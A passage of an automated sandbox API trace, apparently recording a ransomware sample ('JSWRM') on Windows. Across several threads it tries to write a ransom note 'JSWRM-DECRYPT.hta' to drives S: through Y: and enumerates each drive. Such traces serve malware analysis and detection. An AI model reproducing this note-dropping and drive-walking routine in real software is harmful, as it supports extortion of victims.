lpNumberOfBytesWritten=0x485c638, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x485c638, lpOverlapped=0x0) returned 0 [0058.468] CloseHandle (hObject=0xffffffff) returned 1 [0058.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.468] FindFirstFileW (in: lpFileName="S:\\*.*", lpFindFileData=0x485f6f4 | out: lpFindFileData=0x485f6f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0xffffffff, ftLastAccessTime.dwHighDateTime=0xffffffff, ftLastWriteTime.dwLowDateTime=0x77c08939, ftLastWriteTime.dwHighDateTime=0x77bee043, nFileSizeHigh=0x77cc7c0c, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\xaf20\x21\xaf20\x21\x0a")) returned 0xffffffff [0058.468] GetCurrentThreadId () returned 0x100c [0058.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a978 | out: hHeap=0x1e0000) returned 1 [0058.468] GetLastError () returned 0x3 [0058.468] SetLastError (dwErrCode=0x3) [0058.468] FreeLibraryAndExitThread (hLibModule=0x1320000, dwExitCode=0x0) [0058.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x219ef8 | out: hHeap=0x1e0000) returned 1 [0058.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21af28 | out: hHeap=0x1e0000) returned 1 Thread: id = 95 os_tid = 0x1010 [0058.469] GetLastError () returned 0x57 [0058.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x364) returned 0x21af28 [0058.469] SetLastError (dwErrCode=0x57) [0058.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.473] GetFileAttributesW (lpFileName="T:\\JSWRM-DECRYPT.hta" (normalized: "t:\\jswrm-decrypt.hta")) returned 0xffffffff [0058.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x499c748, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.477] CreateFileW (lpFileName="T:\\JSWRM-DECRYPT.hta" (normalized: "t:\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.477] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0058.477] WriteFile (in: hFile=0xffffffff, lpBuffer=0x499c85c, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x499c828, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x499c828, lpOverlapped=0x0) returned 0 [0058.477] CloseHandle (hObject=0xffffffff) returned 1 [0058.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.477] FindFirstFileW (in: lpFileName="T:\\*.*", lpFindFileData=0x499f8e4 | out: lpFindFileData=0x499f8e4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0xffffffff, ftLastAccessTime.dwHighDateTime=0xffffffff, ftLastWriteTime.dwLowDateTime=0x77c08939, ftLastWriteTime.dwHighDateTime=0x77bee043, nFileSizeHigh=0x77cc7c0c, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\xaf20\x21\xaf20\x21\x0a")) returned 0xffffffff [0058.477] GetCurrentThreadId () returned 0x1010 [0058.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a948 | out: hHeap=0x1e0000) returned 1 [0058.478] GetLastError () returned 0x3 [0058.478] SetLastError (dwErrCode=0x3) [0058.478] FreeLibraryAndExitThread (hLibModule=0x1320000, dwExitCode=0x0) [0058.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x219cf8 | out: hHeap=0x1e0000) returned 1 [0058.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21af28 | out: hHeap=0x1e0000) returned 1 Thread: id = 96 os_tid = 0x1014 [0058.479] GetLastError () returned 0x57 [0058.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x364) returned 0x21af28 [0058.479] SetLastError (dwErrCode=0x57) [0058.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.483] GetFileAttributesW (lpFileName="U:\\JSWRM-DECRYPT.hta" (normalized: "u:\\jswrm-decrypt.hta")) returned 0xffffffff [0058.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x4adc560, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.487] CreateFileW (lpFileName="U:\\JSWRM-DECRYPT.hta" (normalized: "u:\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.487] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0058.487] WriteFile (in: hFile=0xffffffff, lpBuffer=0x4adc674, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x4adc640, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x4adc640, lpOverlapped=0x0) returned 0 [0058.487] CloseHandle (hObject=0xffffffff) returned 1 [0058.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.487] FindFirstFileW (in: lpFileName="U:\\*.*", lpFindFileData=0x4adf6fc | out: lpFindFileData=0x4adf6fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0xffffffff, ftLastAccessTime.dwHighDateTime=0xffffffff, ftLastWriteTime.dwLowDateTime=0x77c08939, ftLastWriteTime.dwHighDateTime=0x77bee043, nFileSizeHigh=0x77cc7c0c, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\xaf20\x21\xaf20\x21\x0a")) returned 0xffffffff [0058.487] GetCurrentThreadId () returned 0x1014 [0058.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a870 | out: hHeap=0x1e0000) returned 1 [0058.488] GetLastError () returned 0x3 [0058.488] SetLastError (dwErrCode=0x3) [0058.488] FreeLibraryAndExitThread (hLibModule=0x1320000, dwExitCode=0x0) [0058.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x219d78 | out: hHeap=0x1e0000) returned 1 [0058.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21af28 | out: hHeap=0x1e0000) returned 1 Thread: id = 97 os_tid = 0x1018 [0058.489] GetLastError () returned 0x57 [0058.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x364) returned 0x21af28 [0058.489] SetLastError (dwErrCode=0x57) [0058.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.493] GetFileAttributesW (lpFileName="V:\\JSWRM-DECRYPT.hta" (normalized: "v:\\jswrm-decrypt.hta")) returned 0xffffffff [0058.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x4c1c82c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.497] CreateFileW (lpFileName="V:\\JSWRM-DECRYPT.hta" (normalized: "v:\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.497] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0058.497] WriteFile (in: hFile=0xffffffff, lpBuffer=0x4c1c940, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x4c1c90c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x4c1c90c, lpOverlapped=0x0) returned 0 [0058.497] CloseHandle (hObject=0xffffffff) returned 1 [0058.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.497] FindFirstFileW (in: lpFileName="V:\\*.*", lpFindFileData=0x4c1f9c8 | out: lpFindFileData=0x4c1f9c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0xffffffff, ftLastAccessTime.dwHighDateTime=0xffffffff, ftLastWriteTime.dwLowDateTime=0x77c08939, ftLastWriteTime.dwHighDateTime=0x77bee043, nFileSizeHigh=0x77cc7c0c, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\xcc80\x23\xaf20\x21\xaf20\x21\x0a")) returned 0xffffffff [0058.497] GetCurrentThreadId () returned 0x1018 [0058.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a900 | out: hHeap=0x1e0000) returned 1 [0058.498] GetLastError () returned 0x3 [0058.498] SetLastError (dwErrCode=0x3) [0058.498] FreeLibraryAndExitThread (hLibModule=0x1320000, dwExitCode=0x0) [0058.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x219d98 | out: hHeap=0x1e0000) returned 1 [0058.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21af28 | out: hHeap=0x1e0000) returned 1 Thread: id = 98 os_tid = 0x101c [0058.499] GetLastError () returned 0x57 [0058.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x364) returned 0x21af28 [0058.499] SetLastError (dwErrCode=0x57) [0058.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.503] GetFileAttributesW (lpFileName="W:\\JSWRM-DECRYPT.hta" (normalized: "w:\\jswrm-decrypt.hta")) returned 0xffffffff [0058.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x4d5c584, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.507] CreateFileW (lpFileName="W:\\JSWRM-DECRYPT.hta" (normalized: "w:\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.507] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0058.507] WriteFile (in: hFile=0xffffffff, lpBuffer=0x4d5c698, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x4d5c664, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x4d5c664, lpOverlapped=0x0) returned 0 [0058.507] CloseHandle (hObject=0xffffffff) returned 1 [0058.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.507] FindFirstFileW (in: lpFileName="W:\\*.*", lpFindFileData=0x4d5f720 | out: lpFindFileData=0x4d5f720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0xffffffff, ftLastAccessTime.dwHighDateTime=0xffffffff, ftLastWriteTime.dwLowDateTime=0x77c08939, ftLastWriteTime.dwHighDateTime=0x77bee043, nFileSizeHigh=0x77cc7c0c, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\xcc80\x23\xaf20\x21\xaf20\x21\x0a")) returned 0xffffffff [0058.507] GetCurrentThreadId () returned 0x101c [0058.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a8b8 | out: hHeap=0x1e0000) returned 1 [0058.507] GetLastError () returned 0x3 [0058.507] SetLastError (dwErrCode=0x3) [0058.507] FreeLibraryAndExitThread (hLibModule=0x1320000, dwExitCode=0x0) [0058.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x219db8 | out: hHeap=0x1e0000) returned 1 [0058.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21af28 | out: hHeap=0x1e0000) returned 1 Thread: id = 99 os_tid = 0x1020 [0058.508] GetLastError () returned 0x57 [0058.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x364) returned 0x21af28 [0058.508] SetLastError (dwErrCode=0x57) [0058.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.513] GetFileAttributesW (lpFileName="X:\\JSWRM-DECRYPT.hta" (normalized: "x:\\jswrm-decrypt.hta")) returned 0xffffffff [0058.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x4e9c8c4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.517] CreateFileW (lpFileName="X:\\JSWRM-DECRYPT.hta" (normalized: "x:\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.517] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0058.517] WriteFile (in: hFile=0xffffffff, lpBuffer=0x4e9c9d8, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x4e9c9a4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x4e9c9a4, lpOverlapped=0x0) returned 0 [0058.517] CloseHandle (hObject=0xffffffff) returned 1 [0058.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.517] FindFirstFileW (in: lpFileName="X:\\*.*", lpFindFileData=0x4e9fa60 | out: lpFindFileData=0x4e9fa60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0xffffffff, ftLastAccessTime.dwHighDateTime=0xffffffff, ftLastWriteTime.dwLowDateTime=0x77c08939, ftLastWriteTime.dwHighDateTime=0x77bee043, nFileSizeHigh=0x77cc7c0c, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\xcc80\x23\xaf20\x21\xaf20\x21\x0a")) returned 0xffffffff [0058.517] GetCurrentThreadId () returned 0x1020 [0058.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a810 | out: hHeap=0x1e0000) returned 1 [0058.518] GetLastError () returned 0x3 [0058.518] SetLastError (dwErrCode=0x3) [0058.518] FreeLibraryAndExitThread (hLibModule=0x1320000, dwExitCode=0x0) [0058.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x219998 | out: hHeap=0x1e0000) returned 1 [0058.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21af28 | out: hHeap=0x1e0000) returned 1 Thread: id = 100 os_tid = 0x1024 [0058.519] GetLastError () returned 0x57 [0058.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x364) returned 0x21af28 [0058.519] SetLastError (dwErrCode=0x57) [0058.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.523] GetFileAttributesW (lpFileName="Y:\\JSWRM-DECRYPT.hta" (normalized: "y:\\jswrm-decrypt.hta")) returned 0xffffffff [0058.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x4fdc768, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.527] CreateFileW (lpFileName="Y:\\JSWRM-DECRYPT.hta" (normalized: "y:\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.527] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0058.527] WriteFile (in: hFile=0xffffffff, lpBuffer=0x4fdc87c, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x4fdc848, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x4fdc848, lpOverlapped=0x0) returned 0 [0058.527] CloseHandle (hObject=0xffffffff) returned 1 [0058.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.527] FindFirstFileW (in: lpFileName="Y:\\*.*", lpFindFileData=0x4fdf904 | out: lpFindFileData=0x4fdf904*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x70, 